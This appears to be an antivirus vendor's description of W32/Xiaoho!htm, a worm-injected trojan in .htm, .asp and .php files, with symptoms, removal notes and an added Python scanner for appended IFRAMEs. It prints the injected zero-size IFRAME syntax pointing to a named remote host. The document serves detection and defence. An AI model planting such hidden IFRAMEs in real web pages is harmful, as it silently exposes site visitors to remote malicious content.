W32/Xiaoho!htm

Type: Trojan
SubType: -
Discovery Date: 08/20/2007
Length: Varies
Minimum DAT: 5102 (08/21/2007)
Updated DAT: 5305 (05/28/2008)
Minimum Engine: 5.1.00
Description Added: 08/20/2007
Description Modified: 08/20/2007 6:59 AM (PT)
Risk Assessment
  Corporate User: Low
  Home User: Low

Characteristics

Infected web-based files contain an appended HTML IFRAME (inline-frame) tag which, if rendered, will dynamically download content from a remote web host.

The IFRAME tag in this variant points to the following URL:

  • http://xiaohao.yona.biz/[HIDDEN]

using the following syntax:

  • iframe src= http://xiaohao.yona.biz/[HIDDEN] width=0 height=0 /iframe

At the time of writing, the referenced page doesn’t exist but we will monitor it to see if that changes!

Symptoms

- Increased size of such web files.
   - In the case of this variant, files grew by 77 bytes.

- Presence of IFRAME tags appended to such files (meaning HTML code appears beyond the closing /HTML tag).

- Unexpected HTTP traffic.
   - If an infected file is loaded and rendered in an application such as a web browser, unexpected HTTP traffic may occur on the network. The destination of such traffic would be the URL mentioned in the Characteristics section of this description.
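
One way to check a web root for the appended-IFRAME symptom listed above, as an added example that is not the vendor's detection logic. The function names and sample data are constructed for illustration, and example.invalid stands in for the real host.

```python
import re
from pathlib import Path

WEB_EXTS = {".htm", ".html", ".asp", ".aspx", ".php"}  # extensions named in this description
CLOSE_HTML = re.compile(rb"</html\s*>", re.I)
IFRAME = re.compile(rb"<iframe\b[^>]*>", re.I)
SRC = re.compile(rb"""\bsrc\s*=\s*["']?([^\s"'>]+)""", re.I)
ZERO_DIM = re.compile(rb"""\b(?:width|height)\s*=\s*["']?0(?!\d)""", re.I)


def inspect_bytes(data: bytes):
    """Return a finding dict if an IFRAME follows the last closing HTML tag, else None."""
    closes = list(CLOSE_HTML.finditer(data))
    if not closes:
        return None  # include/fragment without </html>: compare against a known-good copy
    tail = data[closes[-1].end():]
    tag = IFRAME.search(tail)
    if not tag:
        return None
    src = SRC.search(tag.group(0))
    return {
        "trailing_bytes": len(tail),  # bytes found after the closing tag
        "src": src.group(1).decode("latin-1") if src else None,
        "hidden": len(ZERO_DIM.findall(tag.group(0))) >= 2,  # width=0 and height=0
    }


def scan_tree(root):
    """Yield (path, finding) for each web file under root with an appended IFRAME."""
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            finding = inspect_bytes(path.read_bytes())
            if finding:
                yield path, finding


# Constructed samples, not taken from a real infected file.
CLEAN = b"<html><body>hello</body></html>\r\n"
APPENDED = CLEAN + b"<iframe src=http://example.invalid/x width=0 height=0></iframe>"

if __name__ == "__main__":
    import sys
    for p, f in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(p, f)
```

Files flagged this way should be compared against a known-good copy or backup, since some legitimate pages also carry markup after the closing tag.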

Method of Infection

Infection occurs after a system has been infected with the W32/Xiaoho.worm.

Please view the W32/Xiaoho.worm description for more information on this threat.

Removal

AVERT recommends always using the latest DATs and engine. This threat will be cleaned if you have this combination.

Variants

    N/A

Overview

W32/Xiaoho.worm infects web-based files with the extensions .HTM, .HTML, .ASP, .ASPX, or .PHP. These infected files (detected as W32/Xiaoho!htm) are modified such that, when they are opened and rendered, malicious content might be downloaded from remote web hosts.
